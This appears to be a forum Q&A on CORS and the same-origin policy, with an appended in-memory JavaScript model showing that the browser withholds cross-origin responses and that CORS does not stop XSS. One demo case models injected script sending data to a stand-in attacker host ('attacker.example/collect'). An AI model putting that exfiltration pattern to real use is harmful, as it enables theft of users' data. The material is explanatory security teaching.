As I learned from this post, when a page from www.a.com makes an AJAX request to www.b.com, it is www.b.com that decides whether the request should be allowed or not.
Not quite. The request isn't blocked (at least, if it is simple).

By default the JavaScript running on www.a.com is forbidden access to the response from www.b.com.

CORS allows www.b.com to give permission to the JavaScript on www.a.com to access the response.
But what exactly is secured on the client in such a model?
It stops the author of www.a.com from reading data from www.b.com using the browser of a User who has visited both sites and has been authenticated on www.b.com (and thus has access to data that isn't public).

For example, Alice is logged into Google. Alice visits malicious.example which uses XMLHttpRequest to access data from gmail.com. Alice has a GMail account so the response has a list of the most recent email in her inbox. The same origin policy prevents malicious.example from reading it.
For example, a hacker succeeds in injecting an XSS script into my page, and it then makes an AJAX request to his domain to store user data. So the hacker's domain will allow such a request for sure.
Correct. XSS is a different security problem that needs to be addressed at source (i.e. at www.a.com and not in the browser).
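The exchange the answer describes, as an added example that is not part of the original question or answer: a small in-memory model of both sides, the server's CORS decision and the browser's same-origin check on the response. It is a model, not real browser code; it covers only simple GET requests (no preflight), and the origins, URLs, allow-lists and "inbox" body are constructed for the example. The names makeServer, browserFetch and demo are this example's own.

```javascript
// Added example, not code from the original post: a toy model of the
// browser's same-origin policy and of the server-side CORS decision, with
// both sides of the exchange in one file. Origins, URLs, allow-lists and
// the "inbox" data are constructed; nothing here touches a real network.

// Server side. Each server is built from its own allow-list of origins.
// It always receives the request and always answers; CORS only controls
// whether the calling page is later allowed to READ that answer.
function makeServer(allowedOrigins, body) {
  return function handle(request) {
    const response = { status: 200, headers: {}, body };
    const origin = request.headers["origin"];
    if (origin && (allowedOrigins.has("*") || allowedOrigins.has(origin))) {
      // Echo the exact origin rather than "*": browsers refuse "*" when the
      // request carried credentials (cookies), which is the interesting case.
      response.headers["access-control-allow-origin"] = origin;
      response.headers["access-control-allow-credentials"] = "true";
      response.headers["vary"] = "Origin"; // keep shared caches from mixing origins
    }
    return response;
  };
}

// Browser side. The page at pageOrigin asks for url; the browser attaches
// the Origin header itself (script cannot forge it), sends the request with
// the user's cookies for the target site, then decides whether the script
// may see the response.
function browserFetch(pageOrigin, url, server, { credentials = true } = {}) {
  const targetOrigin = new URL(url).origin;
  const request = { method: "GET", url, headers: {} };
  const crossOrigin = targetOrigin !== pageOrigin;
  if (crossOrigin) request.headers["origin"] = pageOrigin;

  const response = server(request); // the request itself is NOT blocked

  if (!crossOrigin) {
    return { ok: true, serverStatus: response.status, body: response.body };
  }
  const acao = response.headers["access-control-allow-origin"];
  const acac = response.headers["access-control-allow-credentials"];
  const allowed = credentials
    ? acao === pageOrigin && acac === "true" // credentialed: exact origin + opt-in
    : acao === pageOrigin || acao === "*";   // anonymous: "*" is acceptable
  if (allowed) {
    return { ok: true, serverStatus: response.status, body: response.body };
  }
  // The server already did the work and sent the data; the browser simply
  // refuses to hand it to the page's script.
  return {
    ok: false,
    serverStatus: response.status,
    body: null,
    error: "blocked by CORS: no matching Access-Control-Allow-Origin",
  };
}

// www.b.com: private data; only www.a.com may read it cross-origin.
const bServer = makeServer(new Set(["https://www.a.com"]), '{"inbox":["mail 1","mail 2"]}');
// The attacker's collector from the XSS scenario: lets any origin read the reply.
const attackerServer = makeServer(new Set(["*"]), "stored");

function demo() {
  return {
    // permitted by www.b.com's CORS policy
    trusted: browserFetch("https://www.a.com", "https://www.b.com/inbox", bServer),
    // the "Alice visits malicious.example" case: request sent, response withheld
    malicious: browserFetch("https://malicious.example", "https://www.b.com/inbox", bServer),
    // script injected into www.a.com posting to a domain that allows everyone
    exfil: browserFetch("https://www.a.com", "https://attacker.example/collect", attackerServer),
  };
}
```

The malicious case is the one to look at: serverStatus is still 200 and the server built the full inbox body, but the page gets body null. That is exactly why CORS does nothing for the XSS case in the last exchange: the attacker controls the receiving server, so it grants itself permission, and the browser has no reason to refuse.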